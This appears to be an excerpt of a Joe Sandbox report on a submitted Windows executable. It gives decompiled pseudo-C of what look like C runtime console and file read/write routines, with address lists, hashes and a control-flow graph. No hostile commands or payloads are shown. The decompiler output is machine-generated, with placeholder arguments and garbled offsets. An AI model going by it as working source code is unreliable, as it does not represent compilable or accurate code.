                                                                                                                                                                                                                                                        				if (( *(_t247 + 0x38 + _t308 * 8) & 0x00000048) == 0) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				_t142 =  *((intOrPtr*)(_t247 + 0x3a + _t308 * 8));
                                                                                                                                                                                                                                                        				if (_t142 == r9b) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				if (_t198 == 0) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				 *_t310 = _t142;
                                                                                                                                                                                                                                                        				_t199 = _t198 - 1;
                                                                                                                                                                                                                                                        				_t311 = _t310 + __rdx;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x3a + _t308 * 8)) = r9b;
                                                                                                                                                                                                                                                        				if (r10b == 0) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x3b + _t308 * 8));
                                                                                                                                                                                                                                                        				if (_t170 == r9b) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				if (_t199 == 0) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				 *_t311 = _t170;
                                                                                                                                                                                                                                                        				_t312 = _t311 + __rdx;
                                                                                                                                                                                                                                                        				_t200 = _t199 - 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x3b + _t308 * 8)) = r9b;
                                                                                                                                                                                                                                                        				if (r10b != 1) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x3c + _t308 * 8));
                                                                                                                                                                                                                                                        				if (_t171 == r9b) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				if (_t200 == 0) goto 0xe5acb15a;
                                                                                                                                                                                                                                                        				 *_t312 = _t171;
                                                                                                                                                                                                                                                        				_t313 = _t312 + __rdx;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x3c + _t308 * 8)) = r9b;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD2A3C(r13d,  *((intOrPtr*)(0xe5afca30 + _t292 * 8))) == 0) goto 0xe5acb1ee;
                                                                                                                                                                                                                                                        				_t254 =  *((intOrPtr*)(0xe5afca30 + _v88 * 8));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t254 + 0x38 + _t308 * 8)) - sil >= 0) goto 0xe5acb1ee;
                                                                                                                                                                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0xe5acb1ee;
                                                                                                                                                                                                                                                        				if (_a8 != 2) goto 0xe5acb1f3;
                                                                                                                                                                                                                                                        				_t202 = _t200 - 1 >> 1;
                                                                                                                                                                                                                                                        				r8d = _t202;
                                                                                                                                                                                                                                                        				_v120 = _t285;
                                                                                                                                                                                                                                                        				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0xe5acb1e2;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(GetLastError(), _t254, _v96);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t254, _t263);
                                                                                                                                                                                                                                                        				goto 0xe5acb361;
                                                                                                                                                                                                                                                        				goto 0xe5acb22e;
                                                                                                                                                                                                                                                        				_v80 = sil;
                                                                                                                                                                                                                                                        				r8d = _t202;
                                                                                                                                                                                                                                                        				_v120 = _t285;
                                                                                                                                                                                                                                                        				_t151 = ReadFile(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                        				if (_t151 == 0) goto 0xe5acb30d;
                                                                                                                                                                                                                                                        				if (_a32 - r12d > 0) goto 0xe5acb30d;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _v88 * 8)) + 0x38 + _t308 * 8)) - sil >= 0) goto 0xe5acb1d3;
                                                                                                                                                                                                                                                        				_t293 = _t280 + _t254 * 2 + _a32;
                                                                                                                                                                                                                                                        				if (_a8 == 2) goto 0xe5acb277;
                                                                                                                                                                                                                                                        				_t278 = _t313;
                                                                                                                                                                                                                                                        				_v120 = _t306 >> 1;
                                                                                                                                                                                                                                                        				_t152 = E00007FF67FF6E5ACAB44(_t151, _t162, r13d, 0, _t263, _t278, _t286, _t293, _a16);
                                                                                                                                                                                                                                                        				goto 0xe5acb1d3;
                                                                                                                                                                                                                                                        				if (_v80 == sil) goto 0xe5acb2fb;
                                                                                                                                                                                                                                                        				_t302 = _v72;
                                                                                                                                                                                                                                                        				_t258 = _t302;
                                                                                                                                                                                                                                                        				_t301 =  &(_t302[_t293 >> 1]);
                                                                                                                                                                                                                                                        				if (_t302 - _t301 >= 0) goto 0xe5acb2ee;
                                                                                                                                                                                                                                                        				_t175 =  *_t258 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t175 == 0x1a) goto 0xe5acb2dd;
                                                                                                                                                                                                                                                        				if (_t175 != 0xd) goto 0xe5acb2c3;
                                                                                                                                                                                                                                                        				_t295 =  &(_t258[1]);
                                                                                                                                                                                                                                                        				if (_t295 - _t301 >= 0) goto 0xe5acb2c3;
                                                                                                                                                                                                                                                        				if ( *_t295 != 0xa) goto 0xe5acb2c3;
                                                                                                                                                                                                                                                        				r11d = 4;
                                                                                                                                                                                                                                                        				goto 0xe5acb2c9;
                                                                                                                                                                                                                                                        				r11d = 2;
                                                                                                                                                                                                                                                        				 *_t302 = 0xa;
                                                                                                                                                                                                                                                        				if ( &(_t258[0x3ffb72d7e518]) - _t301 < 0) goto 0xe5acb29a;
                                                                                                                                                                                                                                                        				goto 0xe5acb2ee;
                                                                                                                                                                                                                                                        				_t260 =  *((intOrPtr*)(0xe5afca30 + _t278 * 8));
                                                                                                                                                                                                                                                        				 *(_t260 + 0x38 + _t308 * 8) =  *(_t260 + 0x38 + _t308 * 8) | 0x00000002;
                                                                                                                                                                                                                                                        				goto 0xe5acb1d3;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACA984(_t152, r13d, _t263, 0xe5afca30, _v72,  &(_t302[1]), 0xe5afca30);
                                                                                                                                                                                                                                                        				goto 0xe5acb270;
                                                                                                                                                                                                                                                        				if (GetLastError() != 5) goto 0xe5acb333;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t260);
                                                                                                                                                                                                                                                        				 *_t260 = 9;
                                                                                                                                                                                                                                                        				_t156 = E00007FF67FF6E5AC4424(_t260);
                                                                                                                                                                                                                                                        				 *_t260 = 5;
                                                                                                                                                                                                                                                        				goto 0xe5acb1d0;
                                                                                                                                                                                                                                                        				if (_t156 != 0x6d) goto 0xe5acb1c9;
                                                                                                                                                                                                                                                        				goto 0xe5acb1d3;
                                                                                                                                                                                                                                                        				goto 0xe5acb361;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t260);
                                                                                                                                                                                                                                                        				 *_t260 = 0xa;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t260);
                                                                                                                                                                                                                                                        				 *_t260 = 9;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC9DB0() | 0xffffffff;
                                                                                                                                                                                                                                                        			}
















































                                                                                                                                                                                                                                                        0x7ff6e5acaf2c
                                                                                                                                                                                                                                                        0x7ff6e5acaf2c
                                                                                                                                                                                                                                                        0x7ff6e5acaf2c
                                                                                                                                                                                                                                                        0x7ff6e5acaf31
                                                                                                                                                                                                                                                        0x7ff6e5acaf4b
                                                                                                                                                                                                                                                        0x7ff6e5acaf52
                                                                                                                                                                                                                                                        0x7ff6e5acaf54
                                                                                                                                                                                                                                                        0x7ff6e5acaf5b
                                                                                                                                                                                                                                                        0x7ff6e5acaf5d
                                                                                                                                                                                                                                                        0x7ff6e5acaf62
                                                                                                                                                                                                                                                        0x7ff6e5acaf68
                                                                                                                                                                                                                                                        0x7ff6e5acaf71
                                                                                                                                                                                                                                                        0x7ff6e5acaf77
                                                                                                                                                                                                                                                        0x7ff6e5acaf7e
                                                                                                                                                                                                                                                        0x7ff6e5acaf87
                                                                                                                                                                                                                                                        0x7ff6e5acaf87
                                                                                                                                                                                                                                                        0x7ff6e5acaf8d
                                                                                                                                                                                                                                                        0x7ff6e5acaf9c
                                                                                                                                                                                                                                                        0x7ff6e5acafa0
                                                                                                                                                                                                                                                        0x7ff6e5acafa5
                                                                                                                                                                                                                                                        0x7ff6e5acafa9
                                                                                                                                                                                                                                                        0x7ff6e5acafb2
                                                                                                                                                                                                                                                        0x7ff6e5acafbf
                                                                                                                                                                                                                                                        0x7ff6e5acafc1
                                                                                                                                                                                                                                                        0x7ff6e5acafc6
                                                                                                                                                                                                                                                        0x7ff6e5acafc8
                                                                                                                                                                                                                                                        0x7ff6e5acafcd
                                                                                                                                                                                                                                                        0x7ff6e5acafd3
                                                                                                                                                                                                                                                        0x7ff6e5acafdb
                                                                                                                                                                                                                                                        0x7ff6e5acafe7
                                                                                                                                                                                                                                                        0x7ff6e5acafed
                                                                                                                                                                                                                                                        0x7ff6e5acaff0
                                                                                                                                                                                                                                                        0x7ff6e5acaffa
                                                                                                                                                                                                                                                        0x7ff6e5acb005
                                                                                                                                                                                                                                                        0x7ff6e5acb00d
                                                                                                                                                                                                                                                        0x7ff6e5acb017
                                                                                                                                                                                                                                                        0x7ff6e5acb01b
                                                                                                                                                                                                                                                        0x7ff6e5acb024
                                                                                                                                                                                                                                                        0x7ff6e5acb026
                                                                                                                                                                                                                                                        0x7ff6e5acb02b
                                                                                                                                                                                                                                                        0x7ff6e5acb02d
                                                                                                                                                                                                                                                        0x7ff6e5acb032
                                                                                                                                                                                                                                                        0x7ff6e5acb038
                                                                                                                                                                                                                                                        0x7ff6e5acb03d
                                                                                                                                                                                                                                                        0x7ff6e5acb048
                                                                                                                                                                                                                                                        0x7ff6e5acb051
                                                                                                                                                                                                                                                        0x7ff6e5acb05a
                                                                                                                                                                                                                                                        0x7ff6e5acb05f
                                                                                                                                                                                                                                                        0x7ff6e5acb066
                                                                                                                                                                                                                                                        0x7ff6e5acb069
                                                                                                                                                                                                                                                        0x7ff6e5acb070
                                                                                                                                                                                                                                                        0x7ff6e5acb075
                                                                                                                                                                                                                                                        0x7ff6e5acb07b
                                                                                                                                                                                                                                                        0x7ff6e5acb07d
                                                                                                                                                                                                                                                        0x7ff6e5acb082
                                                                                                                                                                                                                                                        0x7ff6e5acb088
                                                                                                                                                                                                                                                        0x7ff6e5acb08d
                                                                                                                                                                                                                                                        0x7ff6e5acb093
                                                                                                                                                                                                                                                        0x7ff6e5acb09d
                                                                                                                                                                                                                                                        0x7ff6e5acb09d
                                                                                                                                                                                                                                                        0x7ff6e5acb0a1
                                                                                                                                                                                                                                                        0x7ff6e5acb0a6
                                                                                                                                                                                                                                                        0x7ff6e5acb0b2
                                                                                                                                                                                                                                                        0x7ff6e5acb0c3
                                                                                                                                                                                                                                                        0x7ff6e5acb0c8
                                                                                                                                                                                                                                                        0x7ff6e5acb0ce
                                                                                                                                                                                                                                                        0x7ff6e5acb0d3
                                                                                                                                                                                                                                                        0x7ff6e5acb0df
                                                                                                                                                                                                                                                        0x7ff6e5acb0e1
                                                                                                                                                                                                                                                        0x7ff6e5acb0e9
                                                                                                                                                                                                                                                        0x7ff6e5acb0ed
                                                                                                                                                                                                                                                        0x7ff6e5acb0ef
                                                                                                                                                                                                                                                        0x7ff6e5acb0f2
                                                                                                                                                                                                                                                        0x7ff6e5acb0f8
                                                                                                                                                                                                                                                        0x7ff6e5acb0fd
                                                                                                                                                                                                                                                        0x7ff6e5acb105
                                                                                                                                                                                                                                                        0x7ff6e5acb10b
                                                                                                                                                                                                                                                        0x7ff6e5acb113
                                                                                                                                                                                                                                                        0x7ff6e5acb117
                                                                                                                                                                                                                                                        0x7ff6e5acb119
                                                                                                                                                                                                                                                        0x7ff6e5acb124
                                                                                                                                                                                                                                                        0x7ff6e5acb127
                                                                                                                                                                                                                                                        0x7ff6e5acb129
                                                                                                                                                                                                                                                        0x7ff6e5acb131
                                                                                                                                                                                                                                                        0x7ff6e5acb137
                                                                                                                                                                                                                                                        0x7ff6e5acb13f
                                                                                                                                                                                                                                                        0x7ff6e5acb143
                                                                                                                                                                                                                                                        0x7ff6e5acb145
                                                                                                                                                                                                                                                        0x7ff6e5acb150
                                                                                                                                                                                                                                                        0x7ff6e5acb155
                                                                                                                                                                                                                                                        0x7ff6e5acb164
                                                                                                                                                                                                                                                        0x7ff6e5acb176
                                                                                                                                                                                                                                                        0x7ff6e5acb17f
                                                                                                                                                                                                                                                        0x7ff6e5acb193
                                                                                                                                                                                                                                                        0x7ff6e5acb19d
                                                                                                                                                                                                                                                        0x7ff6e5acb1ac
                                                                                                                                                                                                                                                        0x7ff6e5acb1b1
                                                                                                                                                                                                                                                        0x7ff6e5acb1b4
                                                                                                                                                                                                                                                        0x7ff6e5acb1c1
                                                                                                                                                                                                                                                        0x7ff6e5acb1cb
                                                                                                                                                                                                                                                        0x7ff6e5acb1d6
                                                                                                                                                                                                                                                        0x7ff6e5acb1dd
                                                                                                                                                                                                                                                        0x7ff6e5acb1ec
                                                                                                                                                                                                                                                        0x7ff6e5acb1ee
                                                                                                                                                                                                                                                        0x7ff6e5acb200
                                                                                                                                                                                                                                                        0x7ff6e5acb203
                                                                                                                                                                                                                                                        0x7ff6e5acb20b
                                                                                                                                                                                                                                                        0x7ff6e5acb213
                                                                                                                                                                                                                                                        0x7ff6e5acb221
                                                                                                                                                                                                                                                        0x7ff6e5acb243
                                                                                                                                                                                                                                                        0x7ff6e5acb24d
                                                                                                                                                                                                                                                        0x7ff6e5acb250
                                                                                                                                                                                                                                                        0x7ff6e5acb260
                                                                                                                                                                                                                                                        0x7ff6e5acb266
                                                                                                                                                                                                                                                        0x7ff6e5acb26b
                                                                                                                                                                                                                                                        0x7ff6e5acb272
                                                                                                                                                                                                                                                        0x7ff6e5acb27f
                                                                                                                                                                                                                                                        0x7ff6e5acb281
                                                                                                                                                                                                                                                        0x7ff6e5acb286
                                                                                                                                                                                                                                                        0x7ff6e5acb28c
                                                                                                                                                                                                                                                        0x7ff6e5acb293
                                                                                                                                                                                                                                                        0x7ff6e5acb29a
                                                                                                                                                                                                                                                        0x7ff6e5acb2a1
                                                                                                                                                                                                                                                        0x7ff6e5acb2a7
                                                                                                                                                                                                                                                        0x7ff6e5acb2a9
                                                                                                                                                                                                                                                        0x7ff6e5acb2b0
                                                                                                                                                                                                                                                        0x7ff6e5acb2b6
                                                                                                                                                                                                                                                        0x7ff6e5acb2bb
                                                                                                                                                                                                                                                        0x7ff6e5acb2c1
                                                                                                                                                                                                                                                        0x7ff6e5acb2c3
                                                                                                                                                                                                                                                        0x7ff6e5acb2cc
                                                                                                                                                                                                                                                        0x7ff6e5acb2d9
                                                                                                                                                                                                                                                        0x7ff6e5acb2db
                                                                                                                                                                                                                                                        0x7ff6e5acb2e4
                                                                                                                                                                                                                                                        0x7ff6e5acb2e8
                                                                                                                                                                                                                                                        0x7ff6e5acb2f6
                                                                                                                                                                                                                                                        0x7ff6e5acb303
                                                                                                                                                                                                                                                        0x7ff6e5acb308
                                                                                                                                                                                                                                                        0x7ff6e5acb316
                                                                                                                                                                                                                                                        0x7ff6e5acb318
                                                                                                                                                                                                                                                        0x7ff6e5acb31d
                                                                                                                                                                                                                                                        0x7ff6e5acb323
                                                                                                                                                                                                                                                        0x7ff6e5acb328
                                                                                                                                                                                                                                                        0x7ff6e5acb32e
                                                                                                                                                                                                                                                        0x7ff6e5acb336
                                                                                                                                                                                                                                                        0x7ff6e5acb33e
                                                                                                                                                                                                                                                        0x7ff6e5acb345
                                                                                                                                                                                                                                                        0x7ff6e5acb347
                                                                                                                                                                                                                                                        0x7ff6e5acb34c
                                                                                                                                                                                                                                                        0x7ff6e5acb34e
                                                                                                                                                                                                                                                        0x7ff6e5acb353
                                                                                                                                                                                                                                                        0x7ff6e5acb378

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: c8fc143f1dc7653d3b1a8760b52446874a24c754ffa4ac2946749aad3bb29e0a
                                                                                                                                                                                                                                                        • Instruction ID: 9d06721a76a20524864fd32fceaa1e3ec746e99a47ab72d2897de020f6d244a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8fc143f1dc7653d3b1a8760b52446874a24c754ffa4ac2946749aad3bb29e0a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46C1C623B0C68A41EB619B1994243BD6795EF80F80FA50135DA4ECB791DF7FEC45870A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 876 7ff6e5acc430-7ff6e5acc455 877 7ff6e5acc723 876->877 878 7ff6e5acc45b-7ff6e5acc45e 876->878 879 7ff6e5acc725-7ff6e5acc735 877->879 880 7ff6e5acc460-7ff6e5acc492 call 7ff6e5ac9ce4 878->880 881 7ff6e5acc497-7ff6e5acc4c3 878->881 880->879 883 7ff6e5acc4c5-7ff6e5acc4cc 881->883 884 7ff6e5acc4ce-7ff6e5acc4d4 881->884 883->880 883->884 886 7ff6e5acc4e4-7ff6e5acc4f9 call 7ff6e5ad2a3c 884->886 887 7ff6e5acc4d6-7ff6e5acc4df call 7ff6e5acb7f0 884->887 891 7ff6e5acc613-7ff6e5acc61c 886->891 892 7ff6e5acc4ff-7ff6e5acc508 886->892 887->886 894 7ff6e5acc61e-7ff6e5acc624 891->894 895 7ff6e5acc670-7ff6e5acc695 WriteFile 891->895 892->891 893 7ff6e5acc50e-7ff6e5acc512 892->893 898 7ff6e5acc523-7ff6e5acc52e 893->898 899 7ff6e5acc514-7ff6e5acc51c call 7ff6e5ac3a20 893->899 896 7ff6e5acc65c-7ff6e5acc66e call 7ff6e5acbee8 894->896 897 7ff6e5acc626-7ff6e5acc629 894->897 900 7ff6e5acc6a0 895->900 901 7ff6e5acc697-7ff6e5acc69d GetLastError 895->901 924 7ff6e5acc600-7ff6e5acc607 896->924 902 7ff6e5acc62b-7ff6e5acc62e 897->902 903 7ff6e5acc648-7ff6e5acc65a call 7ff6e5acc108 897->903 905 7ff6e5acc53f-7ff6e5acc554 GetConsoleMode 898->905 906 7ff6e5acc530-7ff6e5acc539 898->906 899->898 908 7ff6e5acc6a3 900->908 901->900 909 7ff6e5acc6b4-7ff6e5acc6be 902->909 910 7ff6e5acc634-7ff6e5acc646 call 7ff6e5acbfec 902->910 903->924 913 7ff6e5acc55a-7ff6e5acc560 905->913 914 7ff6e5acc60c 905->914 906->891 906->905 916 7ff6e5acc6a8 908->916 918 7ff6e5acc6c0-7ff6e5acc6c5 909->918 919 7ff6e5acc71c-7ff6e5acc721 909->919 910->924 922 7ff6e5acc566-7ff6e5acc569 913->922 923 7ff6e5acc5e9-7ff6e5acc5fb call 7ff6e5acba70 913->923 914->891 917 7ff6e5acc6ad 916->917 917->909 925 7ff6e5acc6f3-7ff6e5acc6fd 918->925 926 7ff6e5acc6c7-7ff6e5acc6ca 918->926 919->879 928 7ff6e5acc574-7ff6e5acc582 922->928 929 7ff6e5acc56b-7ff6e5acc56e 922->929 923->924 924->916 933 7ff6e5acc704-7ff6e5acc713 925->933 934 7ff6e5acc6ff-7ff6e5acc702 925->934 931 7ff6e5acc6e3-7ff6e5acc6ee call 7ff6e5ac4400 926->931 932 7ff6e5acc6cc-7ff6e5acc6db 926->932 935 7ff6e5acc584 928->935 936 7ff6e5acc5e0-7ff6e5acc5e4 928->936 929->917 929->928 931->925 932->931 933->919 934->877 934->933 938 7ff6e5acc588-7ff6e5acc59f call 7ff6e5ad2b08 935->938 936->908 942 7ff6e5acc5a1-7ff6e5acc5ad 938->942 943 7ff6e5acc5d7-7ff6e5acc5dd GetLastError 938->943 944 7ff6e5acc5af-7ff6e5acc5c1 call 7ff6e5ad2b08 942->944 945 7ff6e5acc5cc-7ff6e5acc5d3 942->945 943->936 944->943 949 7ff6e5acc5c3-7ff6e5acc5ca 944->949 945->936 947 7ff6e5acc5d5 945->947 947->938 949->945
                                                                                                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACC430(void* __ebx, signed int __ecx, void* __esi, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10, void* __r11) {
                                                                                                                                                                                                                                                        				signed long long _v88;
                                                                                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                                                                                        				void* _v108;
                                                                                                                                                                                                                                                        				signed int _v112;
                                                                                                                                                                                                                                                        				intOrPtr _v120;
                                                                                                                                                                                                                                                        				signed int _v124;
                                                                                                                                                                                                                                                        				long _v128;
                                                                                                                                                                                                                                                        				signed int _v136;
                                                                                                                                                                                                                                                        				long long _v144;
                                                                                                                                                                                                                                                        				signed int _v152;
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				signed short _t99;
                                                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                                                        				int _t115;
                                                                                                                                                                                                                                                        				long _t116;
                                                                                                                                                                                                                                                        				signed int _t117;
                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                        				signed short _t127;
                                                                                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                                                                                        				signed short _t133;
                                                                                                                                                                                                                                                        				signed short _t158;
                                                                                                                                                                                                                                                        				signed short _t166;
                                                                                                                                                                                                                                                        				signed long long _t179;
                                                                                                                                                                                                                                                        				signed int _t183;
                                                                                                                                                                                                                                                        				signed short* _t196;
                                                                                                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                                                                                                        				signed short* _t205;
                                                                                                                                                                                                                                                        				void* _t207;
                                                                                                                                                                                                                                                        				void* _t217;
                                                                                                                                                                                                                                                        				void* _t218;
                                                                                                                                                                                                                                                        				signed long long _t220;
                                                                                                                                                                                                                                                        				void* _t221;
                                                                                                                                                                                                                                                        				signed long long _t222;
                                                                                                                                                                                                                                                        				signed long long _t223;
                                                                                                                                                                                                                                                        				void* _t224;
                                                                                                                                                                                                                                                        				signed short* _t226;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t218 = __r11;
                                                                                                                                                                                                                                                        				_t217 = __r10;
                                                                                                                                                                                                                                                        				_t196 = __rdx;
                                                                                                                                                                                                                                                        				_t122 = __ebx;
                                                                                                                                                                                                                                                        				r14d = r8d;
                                                                                                                                                                                                                                                        				_t183 = __r9;
                                                                                                                                                                                                                                                        				_t205 = __rdx;
                                                                                                                                                                                                                                                        				if (r8d == 0) goto 0xe5acc723;
                                                                                                                                                                                                                                                        				if (__rdx != 0) goto 0xe5acc497;
                                                                                                                                                                                                                                                        				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                                                                                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				_v144 = __r9;
                                                                                                                                                                                                                                                        				_v152 = _t204;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __r9, __rcx, __rdx, __rdx, _t207, __r8);
                                                                                                                                                                                                                                                        				goto 0xe5acc725;
                                                                                                                                                                                                                                                        				_t220 = __ecx >> 6;
                                                                                                                                                                                                                                                        				_v88 = _t220;
                                                                                                                                                                                                                                                        				_t223 = __ecx + __ecx * 8;
                                                                                                                                                                                                                                                        				_t99 =  *((intOrPtr*)(0xe5afca30 + 0x39 + _t223 * 8));
                                                                                                                                                                                                                                                        				_v136 = _t99;
                                                                                                                                                                                                                                                        				if (_t99 - 1 - 1 > 0) goto 0xe5acc4ce;
                                                                                                                                                                                                                                                        				if (( !r14d & 0x00000001) == 0) goto 0xe5acc460;
                                                                                                                                                                                                                                                        				if (( *( *((intOrPtr*)(0xe5afca30 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0xe5acc4e4;
                                                                                                                                                                                                                                                        				_t23 = _t196 + 2; // 0x2
                                                                                                                                                                                                                                                        				r8d = _t23;
                                                                                                                                                                                                                                                        				0xe5acb7f0();
                                                                                                                                                                                                                                                        				_v112 = _t204;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD2A3C(r15d, __ecx) == 0) goto 0xe5acc613;
                                                                                                                                                                                                                                                        				if ( *( *((intOrPtr*)(0xe5afca30 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0xe5acc613;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0xe5acc523;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20( *((intOrPtr*)(0xe5afca30 + _t220 * 8)), __r9, __r9, _t205);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t204) goto 0xe5acc53f;
                                                                                                                                                                                                                                                        				_t179 =  *((intOrPtr*)(0xe5afca30 + _t220 * 8));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t179 + 0x39 + _t223 * 8)) == dil) goto 0xe5acc613;
                                                                                                                                                                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0xe5acc60c;
                                                                                                                                                                                                                                                        				_t127 = _v136;
                                                                                                                                                                                                                                                        				_t158 = _t127;
                                                                                                                                                                                                                                                        				if (_t158 == 0) goto 0xe5acc5e9;
                                                                                                                                                                                                                                                        				if (_t158 == 0) goto 0xe5acc574;
                                                                                                                                                                                                                                                        				if (_t127 - 1 != 1) goto 0xe5acc6ad;
                                                                                                                                                                                                                                                        				_t221 = _t205 + _t224;
                                                                                                                                                                                                                                                        				_v128 = _t204;
                                                                                                                                                                                                                                                        				_t226 = _t205;
                                                                                                                                                                                                                                                        				if (_t205 - _t221 >= 0) goto 0xe5acc5e0;
                                                                                                                                                                                                                                                        				r14d = _v124;
                                                                                                                                                                                                                                                        				_v136 =  *_t226 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t107 = E00007FF67FF6E5AD2B08( *_t226 & 0xffff);
                                                                                                                                                                                                                                                        				_t130 = _v136 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t107 != _t130) goto 0xe5acc5d7;
                                                                                                                                                                                                                                                        				r14d = r14d + 2;
                                                                                                                                                                                                                                                        				_v124 = r14d;
                                                                                                                                                                                                                                                        				if (_t130 != 0xa) goto 0xe5acc5cc;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD2B08(0xd) != 0xd) goto 0xe5acc5d7;
                                                                                                                                                                                                                                                        				r14d = r14d + 1;
                                                                                                                                                                                                                                                        				_v124 = r14d;
                                                                                                                                                                                                                                                        				if ( &(_t226[1]) - _t221 >= 0) goto 0xe5acc5e0;
                                                                                                                                                                                                                                                        				goto 0xe5acc588;
                                                                                                                                                                                                                                                        				_v128 = GetLastError();
                                                                                                                                                                                                                                                        				_t222 = _v88;
                                                                                                                                                                                                                                                        				goto 0xe5acc6a3;
                                                                                                                                                                                                                                                        				r9d = r14d;
                                                                                                                                                                                                                                                        				_v152 = __r9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACBA70(_t109, r15d, __esi, __r9,  &_v128,  &_v96, _t205);
                                                                                                                                                                                                                                                        				asm("movsd xmm0, [eax]");
                                                                                                                                                                                                                                                        				goto 0xe5acc6a8;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0xe5acc670;
                                                                                                                                                                                                                                                        				_t133 = _v136;
